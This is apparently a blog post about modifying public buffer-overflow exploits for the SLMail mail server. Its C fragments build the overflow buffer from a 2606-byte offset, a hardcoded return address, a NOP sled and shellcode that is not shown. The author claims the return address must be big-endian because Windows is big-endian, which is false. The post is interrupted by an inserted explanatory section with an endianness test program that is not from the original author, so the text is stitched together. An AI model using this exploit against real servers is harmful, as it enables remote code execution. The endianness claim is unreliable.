Modifying some exploit code

So I have been working on some exploit code for the past couple of days. The code is around a fairly old piece of software called SLMail. I liked the Python version of the exploit as it was straightforward, while the compiled binary was a little more involved. The Linux exploit is on exploit-db (https://www.exploit-db.com/exploits/643/), but this exploit did not seem to work, so a slight modification is needed below. I also fixed the Windows binary as well (https://www.exploit-db.com/exploits/646/).

643

This file seemed to be fairly straightforward; I had to modify the payload to suit my needs and enter these lines:

#define retadd "\x8f\x35\x4a\x5f" 
#define port 110


int main(int argc, char *argv[])
{
    int xs;
    char out[1024];
    char *buffer = malloc(3500);
    memset(buffer, 0x00, 3500);
    char *off = malloc(2606);

    memset(off, 0x41, 2606);
    char *nop = malloc(16);

    memset(nop, 0x90, 16);
    strcat(buffer, off);
    strcat(buffer, retadd);
    strcat(buffer, nop);
    strcat(buffer, shellcode);

Since it was written for Linux, it was easy to compile under GCC.

646

This one is exactly the same exploit except it was written as a Windows executable, so I had to use Mingw32 to cross-compile this code. One key takeaway I learned from this code was that the EIP address needed to be inserted in Big Endian format, which took trial and error because it seemed to show up correctly on the EIP register in Immunity dbg. (GitHub link)

void exploit(int sock) {
      FILE *test;
      char *ptr;
      char userbuf[] = "USER generaluser\r\n";
      char evil[3501];
      char buf[3501];
      char receive[1024];
      char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x90\x90";
      memset(buf, 0x00, 3500);
      memset(evil, 0x00, 3500);
      memset(evil, 0x43, 3450);
      *(long*)&evil[2606] = 0x5f4a358f; // Windows is Big Endian?
      ptr = &evil[2610];
      memcpy(ptr, &nopsled, 16);
      ptr = &evil[2626];
      memcpy(ptr, &shellcode, 351);
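
The two listings place the same four bytes in the buffer: x86 is little-endian, so storing the integer 0x5f4a358f writes 8f 35 4a 5f to memory, which is the byte string from the 643 listing, while a debugger's register view prints the value most significant byte first. The following is an added example, not code from the original post or from exploit-db; the helper names are made up for illustration and it only compares byte layouts.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Byte-string form from the 643 listing and integer form from the 646 listing. */
static const unsigned char RET_BYTES[4] = { 0x8f, 0x35, 0x4a, 0x5f };
#define RET_VALUE 0x5f4a358fu

/* Returns 1 if this host stores the least significant byte first. */
int host_is_little_endian(void) {
    uint32_t probe = 1;
    unsigned char first;
    memcpy(&first, &probe, 1);
    return first == 1;
}

/* Serialise v with an explicit byte order, independent of the host CPU. */
void store_le32(unsigned char *dst, uint32_t v) {
    for (int i = 0; i < 4; i++) dst[i] = (unsigned char)(v >> (8 * i));
}
void store_be32(unsigned char *dst, uint32_t v) {
    for (int i = 0; i < 4; i++) dst[i] = (unsigned char)(v >> (8 * (3 - i)));
}

/* Each check returns 1 when the layout equals the byte string from 643. */
int le_layout_matches_string(void) {
    unsigned char b[4];
    store_le32(b, RET_VALUE);
    return memcmp(b, RET_BYTES, 4) == 0;
}
int be_layout_matches_string(void) {
    unsigned char b[4];
    store_be32(b, RET_VALUE);
    return memcmp(b, RET_BYTES, 4) == 0;
}
int native_store_matches_string(void) {
    uint32_t v = RET_VALUE;          /* what a 4-byte integer store does */
    unsigned char b[4];
    memcpy(b, &v, sizeof v);         /* memcpy avoids the unaligned cast */
    return memcmp(b, RET_BYTES, 4) == 0;
}

int main(void) {
    printf("host little-endian:     %d\n", host_is_little_endian());
    printf("LE layout == string:    %d\n", le_layout_matches_string());
    printf("BE layout == string:    %d\n", be_layout_matches_string());
    printf("native store == string: %d\n", native_store_matches_string());
    printf("sizeof(long), the width a *(long*) store writes: %zu\n", sizeof(long));
    return 0;
}
```

The last line matters when porting the 646 listing: `long` is 4 bytes when built with a 32-bit Windows toolchain but 8 bytes on 64-bit Linux, where the same cast would write eight bytes instead of four.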

 

 

Written by

gseeto

Technology, Science and Philosophy